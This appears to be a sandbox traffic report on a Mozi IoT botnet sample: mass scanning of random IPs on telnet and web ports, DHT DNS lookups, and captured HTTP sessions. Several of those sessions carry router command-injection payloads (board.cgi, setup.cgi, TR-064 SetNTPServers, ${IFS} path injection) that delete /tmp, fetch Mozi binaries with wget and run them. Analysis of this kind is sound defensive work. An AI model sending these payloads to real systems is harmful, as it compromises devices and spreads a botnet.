                                                              Dec 11, 2024 00:43:29.306957960 CET1020023192.168.2.239.46.245.208
                                                              Dec 11, 2024 00:43:29.306969881 CET1020023192.168.2.2388.103.5.102
                                                              Dec 11, 2024 00:43:29.306971073 CET1020023192.168.2.231.155.94.97
                                                              Dec 11, 2024 00:43:29.306979895 CET1020023192.168.2.23195.181.73.101
                                                              Dec 11, 2024 00:43:29.306996107 CET1020023192.168.2.2386.186.188.210
                                                              Dec 11, 2024 00:43:29.306998014 CET1020023192.168.2.23211.51.125.109
                                                              Dec 11, 2024 00:43:29.307002068 CET1020023192.168.2.23217.56.46.192
                                                              Dec 11, 2024 00:43:29.307013988 CET1020023192.168.2.23164.180.37.108
                                                              Dec 11, 2024 00:43:29.307017088 CET1020023192.168.2.238.203.67.99
                                                              Dec 11, 2024 00:43:29.307032108 CET1020023192.168.2.23186.0.241.137
                                                              Dec 11, 2024 00:43:29.307034016 CET102002323192.168.2.23150.212.187.192
                                                              Dec 11, 2024 00:43:29.307034969 CET1020023192.168.2.2382.203.107.168
                                                              Dec 11, 2024 00:43:29.307053089 CET1020023192.168.2.23154.76.104.78
                                                              Dec 11, 2024 00:43:29.307060957 CET1020023192.168.2.23113.83.115.74
                                                              Dec 11, 2024 00:43:29.307071924 CET1020023192.168.2.23210.213.98.24
                                                              Dec 11, 2024 00:43:29.307080030 CET1020023192.168.2.23115.120.132.213
                                                              Dec 11, 2024 00:43:29.307085037 CET1020023192.168.2.232.63.157.202
                                                              Dec 11, 2024 00:43:29.307097912 CET1020023192.168.2.2313.116.67.43
                                                              Dec 11, 2024 00:43:29.307101011 CET1020023192.168.2.23195.48.100.142
                                                              Dec 11, 2024 00:43:29.307111979 CET102002323192.168.2.23108.146.192.31
                                                              Dec 11, 2024 00:43:29.307115078 CET1020023192.168.2.2346.40.107.14
                                                              Dec 11, 2024 00:43:29.307130098 CET1020023192.168.2.2335.88.192.161
                                                              Dec 11, 2024 00:43:29.307132959 CET102001023192.168.2.2343.120.26.62
                                                              Dec 11, 2024 00:43:29.307147980 CET1020023192.168.2.23123.164.127.130
                                                              Dec 11, 2024 00:43:29.307147980 CET1020023192.168.2.23203.105.250.51
                                                              Dec 11, 2024 00:43:29.307149887 CET1020023192.168.2.2379.75.96.33
                                                              Dec 11, 2024 00:43:29.307164907 CET1020023192.168.2.23170.28.10.123
                                                              Dec 11, 2024 00:43:29.307168007 CET1020023192.168.2.23150.58.17.29
                                                              Dec 11, 2024 00:43:29.307180882 CET1020023192.168.2.2384.76.50.178
                                                              Dec 11, 2024 00:43:29.307182074 CET102002323192.168.2.2336.23.149.188
                                                              Dec 11, 2024 00:43:29.307184935 CET1020023192.168.2.2389.245.133.57
                                                              Dec 11, 2024 00:43:29.307193041 CET1020023192.168.2.231.122.55.156
                                                              Dec 11, 2024 00:43:29.307202101 CET1020023192.168.2.23223.145.46.72
                                                              Dec 11, 2024 00:43:29.307209015 CET1020023192.168.2.2397.68.83.247
                                                              Dec 11, 2024 00:43:29.307221889 CET1020023192.168.2.23184.133.121.41
                                                              Dec 11, 2024 00:43:29.307224989 CET1020023192.168.2.23142.176.225.10
                                                              Dec 11, 2024 00:43:29.307239056 CET1020023192.168.2.23201.108.130.83
                                                              Dec 11, 2024 00:43:29.307240009 CET1020023192.168.2.23218.117.17.22
                                                              Dec 11, 2024 00:43:29.307246923 CET1020023192.168.2.23151.176.34.121
                                                              Dec 11, 2024 00:43:29.307251930 CET102002323192.168.2.23133.144.81.208
                                                              Dec 11, 2024 00:43:29.307270050 CET1020023192.168.2.23180.221.185.78
                                                              Dec 11, 2024 00:43:29.307285070 CET1020023192.168.2.2370.89.97.53
                                                              Dec 11, 2024 00:43:29.307287931 CET1020023192.168.2.23189.40.74.226
                                                              Dec 11, 2024 00:43:29.307301998 CET1020023192.168.2.2362.154.240.69
                                                              Dec 11, 2024 00:43:29.307303905 CET1020023192.168.2.23216.226.95.137
                                                              Dec 11, 2024 00:43:29.307305098 CET1020023192.168.2.23141.176.59.220
                                                              Dec 11, 2024 00:43:29.307329893 CET1020023192.168.2.2394.136.216.174
                                                              Dec 11, 2024 00:43:29.307331085 CET1020023192.168.2.23190.42.188.69
                                                              Dec 11, 2024 00:43:29.307333946 CET102002323192.168.2.2386.199.168.224
                                                              Dec 11, 2024 00:43:29.307336092 CET1020023192.168.2.2383.250.48.92
                                                              Dec 11, 2024 00:43:29.307344913 CET1020023192.168.2.23166.26.214.156
                                                              Dec 11, 2024 00:43:29.307351112 CET1020023192.168.2.2348.3.230.115
                                                              Dec 11, 2024 00:43:29.307373047 CET1020023192.168.2.2361.249.176.252
                                                              Dec 11, 2024 00:43:29.307378054 CET1020023192.168.2.2392.200.23.127
                                                              Dec 11, 2024 00:43:29.307384968 CET1020023192.168.2.23119.33.173.74
                                                              Dec 11, 2024 00:43:29.307437897 CET1020023192.168.2.2363.25.175.129
                                                              Dec 11, 2024 00:43:29.307440042 CET1020023192.168.2.2364.231.62.39
                                                              Dec 11, 2024 00:43:29.307450056 CET1020023192.168.2.2384.124.2.112
                                                              Dec 11, 2024 00:43:29.307461023 CET1020023192.168.2.2327.80.119.162
                                                              Dec 11, 2024 00:43:29.310373068 CET4035680192.168.2.23107.199.17.115
                                                              Dec 11, 2024 00:43:29.312922955 CET569988080192.168.2.2332.247.7.158
                                                              Dec 11, 2024 00:43:29.316196918 CET513508080192.168.2.2319.234.121.194
                                                              Dec 11, 2024 00:43:29.318746090 CET401625555192.168.2.23205.6.203.133
                                                              Dec 11, 2024 00:43:29.322382927 CET603268080192.168.2.23167.193.195.24
                                                              Dec 11, 2024 00:43:29.324929953 CET430648443192.168.2.2324.148.85.6
                                                              Dec 11, 2024 00:43:29.328572035 CET4350680192.168.2.23148.56.202.17
                                                              Dec 11, 2024 00:43:29.331118107 CET3289049152192.168.2.2328.73.69.70
                                                              Dec 11, 2024 00:43:29.337305069 CET571008080192.168.2.2396.141.159.101
                                                              Dec 11, 2024 00:43:29.339514017 CET349548080192.168.2.23150.213.241.201
                                                              Dec 11, 2024 00:43:29.343518972 CET436908080192.168.2.2317.99.132.43
                                                              Dec 11, 2024 00:43:29.344620943 CET3492680192.168.2.23166.38.229.239
                                                              Dec 11, 2024 00:43:29.346443892 CET3974681192.168.2.23122.77.103.87
                                                              Dec 11, 2024 00:43:29.347907066 CET4544481192.168.2.2325.112.144.192
                                                              Dec 11, 2024 00:43:29.349725008 CET571768080192.168.2.23136.96.254.154
                                                              Dec 11, 2024 00:43:29.355895996 CET4089449152192.168.2.23138.164.52.41
                                                              Dec 11, 2024 00:43:29.356987953 CET6048637215192.168.2.2317.151.75.62
                                                              Dec 11, 2024 00:43:29.360726118 CET512548443192.168.2.23192.149.30.100
                                                              Dec 11, 2024 00:43:29.362554073 CET3690080192.168.2.23198.157.1.165
                                                              Dec 11, 2024 00:43:29.366168976 CET371605555192.168.2.23126.148.68.48
                                                              Dec 11, 2024 00:43:29.367269039 CET351608443192.168.2.2333.133.30.101
                                                              Dec 11, 2024 00:43:29.370537996 CET5856681192.168.2.23204.239.32.243
                                                              Dec 11, 2024 00:43:29.372354984 CET438507574192.168.2.23106.242.46.194
                                                              Dec 11, 2024 00:43:29.373449087 CET420088443192.168.2.2315.108.62.198
                                                              Dec 11, 2024 00:43:29.375264883 CET5066280192.168.2.23114.65.149.154
                                                              Dec 11, 2024 00:43:29.378531933 CET4041480192.168.2.2329.225.155.234
                                                              Dec 11, 2024 00:43:29.380712032 CET504745555192.168.2.2367.84.206.98
                                                              Dec 11, 2024 00:43:29.385082006 CET4952480192.168.2.23201.192.233.8
                                                              Dec 11, 2024 00:43:29.387269974 CET5256249152192.168.2.23209.205.122.138
                                                              Dec 11, 2024 00:43:29.390548944 CET545145555192.168.2.2378.94.137.102
                                                              Dec 11, 2024 00:43:29.392807961 CET5896480192.168.2.23192.187.71.247
                                                              Dec 11, 2024 00:43:29.397033930 CET3277280192.168.2.2371.6.68.16
                                                              Dec 11, 2024 00:43:29.399379015 CET4750649152192.168.2.2335.231.190.141
                                                              Dec 11, 2024 00:43:29.406804085 CET5196480192.168.2.23105.19.219.193
                                                              Dec 11, 2024 00:43:29.408454895 CET4091437215192.168.2.2370.145.33.196
                                                              Dec 11, 2024 00:43:29.413021088 CET5173449152192.168.2.2370.63.116.108
                                                              Dec 11, 2024 00:43:29.413976908 CET815367258.49.123.103192.168.2.23
                                                              Dec 11, 2024 00:43:29.414025068 CET5367281192.168.2.2358.49.123.103
                                                              Dec 11, 2024 00:43:29.414110899 CET804850687.186.17.243192.168.2.23
                                                              Dec 11, 2024 00:43:29.414145947 CET4850680192.168.2.2387.186.17.243
                                                              Dec 11, 2024 00:43:29.415766954 CET584885555192.168.2.2353.63.73.184
                                                              Dec 11, 2024 00:43:29.419598103 CET4238680192.168.2.2375.12.144.234
                                                              Dec 11, 2024 00:43:29.422348022 CET525788080192.168.2.23213.27.6.155
                                                              Dec 11, 2024 00:43:29.425873995 CET3369280192.168.2.23112.78.37.95
                                                              Dec 11, 2024 00:43:29.428220034 CET10231020039.115.244.160192.168.2.23
                                                              Dec 11, 2024 00:43:29.428266048 CET102001023192.168.2.2339.115.244.160
                                                              Dec 11, 2024 00:43:29.428275108 CET2310200156.80.50.58192.168.2.23
                                                              Dec 11, 2024 00:43:29.428284883 CET231020079.161.70.24192.168.2.23
                                                              Dec 11, 2024 00:43:29.428314924 CET1020023192.168.2.23156.80.50.58
                                                              Dec 11, 2024 00:43:29.428318977 CET1020023192.168.2.2379.161.70.24
                                                              Dec 11, 2024 00:43:29.428550005 CET2310200179.75.134.15192.168.2.23
                                                              Dec 11, 2024 00:43:29.428560019 CET231020097.166.152.237192.168.2.23
                                                              Dec 11, 2024 00:43:29.428570032 CET2310200126.192.142.159192.168.2.23
                                                              Dec 11, 2024 00:43:29.428577900 CET2310200163.68.173.120192.168.2.23
                                                              Dec 11, 2024 00:43:29.428586960 CET231020061.130.15.235192.168.2.23
                                                              Dec 11, 2024 00:43:29.428589106 CET1020023192.168.2.23179.75.134.15
                                                              Dec 11, 2024 00:43:29.428589106 CET1020023192.168.2.2397.166.152.237
                                                              Dec 11, 2024 00:43:29.428596020 CET23231020081.184.163.193192.168.2.23
                                                              Dec 11, 2024 00:43:29.428605080 CET2310200178.197.98.109192.168.2.23
                                                              Dec 11, 2024 00:43:29.428612947 CET2310200142.109.152.118192.168.2.23
                                                              Dec 11, 2024 00:43:29.428620100 CET102002323192.168.2.2381.184.163.193
                                                              Dec 11, 2024 00:43:29.428621054 CET2310200124.23.64.5192.168.2.23
                                                              Dec 11, 2024 00:43:29.428625107 CET1020023192.168.2.23126.192.142.159
                                                              Dec 11, 2024 00:43:29.428628922 CET1020023192.168.2.23163.68.173.120
                                                              Dec 11, 2024 00:43:29.428634882 CET2310200122.12.198.29192.168.2.23
                                                              Dec 11, 2024 00:43:29.428636074 CET1020023192.168.2.2361.130.15.235
                                                              Dec 11, 2024 00:43:29.428637028 CET1020023192.168.2.23178.197.98.109
                                                              Dec 11, 2024 00:43:29.428642988 CET1020023192.168.2.23142.109.152.118
                                                              Dec 11, 2024 00:43:29.428644896 CET2310200197.100.236.36192.168.2.23
                                                              Dec 11, 2024 00:43:29.428652048 CET1020023192.168.2.23124.23.64.5
                                                              Dec 11, 2024 00:43:29.428653002 CET2310200176.63.63.3192.168.2.23
                                                              Dec 11, 2024 00:43:29.428661108 CET2310200176.175.208.131192.168.2.23
                                                              Dec 11, 2024 00:43:29.428663969 CET1020023192.168.2.23122.12.198.29
                                                              Dec 11, 2024 00:43:29.428668976 CET2310200178.241.158.49192.168.2.23
                                                              Dec 11, 2024 00:43:29.428678036 CET2310200120.150.250.251192.168.2.23
                                                              Dec 11, 2024 00:43:29.428682089 CET1020023192.168.2.23176.63.63.3
                                                              Dec 11, 2024 00:43:29.428682089 CET1020023192.168.2.23197.100.236.36
                                                              Dec 11, 2024 00:43:29.428685904 CET2310200126.87.149.16192.168.2.23
                                                              Dec 11, 2024 00:43:29.428694963 CET232310200209.46.141.74192.168.2.23
                                                              Dec 11, 2024 00:43:29.428694963 CET1020023192.168.2.23178.241.158.49
                                                              Dec 11, 2024 00:43:29.428697109 CET5574880192.168.2.23183.56.155.12
                                                              Dec 11, 2024 00:43:29.428703070 CET1020023192.168.2.23176.175.208.131
                                                              Dec 11, 2024 00:43:29.428704977 CET2310200151.17.117.39192.168.2.23
                                                              Dec 11, 2024 00:43:29.428713083 CET1020023192.168.2.23120.150.250.251
                                                              Dec 11, 2024 00:43:29.428713083 CET1020023192.168.2.23126.87.149.16
                                                              Dec 11, 2024 00:43:29.428720951 CET23102008.103.144.56192.168.2.23
                                                              Dec 11, 2024 00:43:29.428723097 CET102002323192.168.2.23209.46.141.74
                                                              Dec 11, 2024 00:43:29.428731918 CET2310200188.141.19.124192.168.2.23
                                                              Dec 11, 2024 00:43:29.428740025 CET231020095.216.199.144192.168.2.23
                                                              Dec 11, 2024 00:43:29.428742886 CET1020023192.168.2.238.103.144.56
                                                              Dec 11, 2024 00:43:29.428745031 CET1020023192.168.2.23151.17.117.39
                                                              Dec 11, 2024 00:43:29.428750992 CET2310200112.88.253.26192.168.2.23
                                                              Dec 11, 2024 00:43:29.428760052 CET2310200110.136.249.115192.168.2.23
                                                              Dec 11, 2024 00:43:29.428766966 CET1020023192.168.2.23188.141.19.124
                                                              Dec 11, 2024 00:43:29.428769112 CET231020019.138.19.99192.168.2.23
                                                              Dec 11, 2024 00:43:29.428775072 CET1020023192.168.2.2395.216.199.144
                                                              Dec 11, 2024 00:43:29.428778887 CET231020069.72.185.148192.168.2.23
                                                              Dec 11, 2024 00:43:29.428782940 CET1020023192.168.2.23112.88.253.26
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 11, 2024 00:43:23.015583992 CET192.168.2.231.1.1.10xa1fbStandard query (0)dht.transmissionbt.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:23.155900955 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:28.156542063 CET192.168.2.238.8.8.80xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:33.156929016 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:38.159082890 CET192.168.2.231.1.1.10xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:38.159133911 CET192.168.2.238.8.8.80xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:43.160918951 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:43.160936117 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:48.161788940 CET192.168.2.231.1.1.10xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:48.161811113 CET192.168.2.238.8.8.80xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:53.163953066 CET192.168.2.238.8.8.80x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:53.164005041 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:53.164037943 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:58.164505005 CET192.168.2.231.1.1.10xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:58.164532900 CET192.168.2.238.8.8.80xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:58.164551020 CET192.168.2.231.1.1.10x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:03.167632103 CET192.168.2.238.8.8.80x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:03.167656898 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:03.167675018 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:08.289392948 CET192.168.2.231.1.1.10x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:08.289412022 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:08.289422035 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:13.538661003 CET192.168.2.238.8.8.80x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:13.538683891 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:13.538711071 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:18.787955999 CET192.168.2.231.1.1.10x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:18.788124084 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:18.788175106 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:24.037163019 CET192.168.2.238.8.8.80x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:24.037189007 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:24.037197113 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:29.286473989 CET192.168.2.231.1.1.10x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:29.286521912 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:29.286536932 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:34.535862923 CET192.168.2.238.8.8.80x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:34.535959959 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:34.536005020 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:39.785042048 CET192.168.2.231.1.1.10x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:39.785106897 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:39.785131931 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:45.034667969 CET192.168.2.238.8.8.80x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:45.034748077 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:45.034791946 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:50.283536911 CET192.168.2.231.1.1.10x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:50.283564091 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:50.283565998 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:55.532994032 CET192.168.2.238.8.8.80x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:55.533056021 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:44:55.533118963 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:00.782179117 CET192.168.2.231.1.1.10x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:00.782269955 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:00.782294035 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:06.031363010 CET192.168.2.238.8.8.80x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:06.031397104 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:06.031399012 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:11.280647993 CET192.168.2.231.1.1.10x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:11.280699968 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:11.280718088 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:16.530293941 CET192.168.2.238.8.8.80x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:16.530334949 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:16.530364037 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:21.779149055 CET192.168.2.231.1.1.10x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:21.779172897 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:21.779181004 CET192.168.2.231.1.1.10xec2dStandard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:27.028434992 CET192.168.2.238.8.8.80x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:27.028500080 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:32.277733088 CET192.168.2.231.1.1.10x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:32.277755976 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:37.526964903 CET192.168.2.231.1.1.10x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:37.526999950 CET192.168.2.238.8.8.80xf507Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:42.776340008 CET192.168.2.231.1.1.10x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:48.025607109 CET192.168.2.231.1.1.10x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:45:53.274822950 CET192.168.2.238.8.8.80x1791Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 11, 2024 00:43:23.152563095 CET1.1.1.1192.168.2.230xa1fbNo error (0)dht.transmissionbt.com212.129.33.59A (IP address)IN (0x0001)false
                                                              Dec 11, 2024 00:43:23.152563095 CET1.1.1.1192.168.2.230xa1fbNo error (0)dht.transmissionbt.com87.98.162.88A (IP address)IN (0x0001)false
                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              0192.168.2.2359762170.13.70.648080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.224473000 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1192.168.2.2344588118.114.118.19081
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.224524021 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              2192.168.2.234827465.224.38.2498080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.224549055 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              3192.168.2.234664034.136.79.417574
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.224577904 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:7574
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              4192.168.2.2348522178.51.3.12880
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.224601030 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              5192.168.2.2338540202.152.121.1880
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.224778891 CET803OUTPOST /HNAP1/ HTTP/1.0
